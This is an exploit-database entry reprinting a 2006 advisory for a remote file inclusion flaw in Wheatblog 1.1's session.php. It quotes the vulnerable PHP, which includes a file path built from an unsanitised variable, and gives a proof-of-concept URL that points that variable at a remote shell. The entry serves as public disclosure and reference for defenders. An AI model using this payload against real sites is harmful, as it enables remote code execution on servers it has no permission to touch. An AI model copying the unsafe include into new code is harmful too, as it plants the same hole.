Wheatblog 1.1 - 'session.php' Remote File Inclusion
Author: O.U.T.L.A.W
type: webapps
platform: php
port: 80.0
date_added: 2006-08-10
date_updated: 2016-09-01
verified: 1
codes: OSVDB-29192;CVE-2006-4198
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comwheatblog-1.1.zip
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.u.r.a & l2odon & DrtRp & Sh3ll #
###########################################################################################
<?php
include_once("$wb_class_dir/classDatabase.php");
function Start_Session()
{
global $session_dir;
if ( $session_dir != '' )
session_save_path($session_dir);
if ( ! isset($_SESSION) )
{
session_start();
// Supposedly a fix for IE6
header('Cache-control: private');
My_Cache();
if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
touchDatabaseSession();
}
}
***********************************************************************
Proof of Concept:
server/includes/session.php?wb_class_dir=SHELL
Contact : Outlaw@aria-security.net
# milw0rm.com [2006-08-11]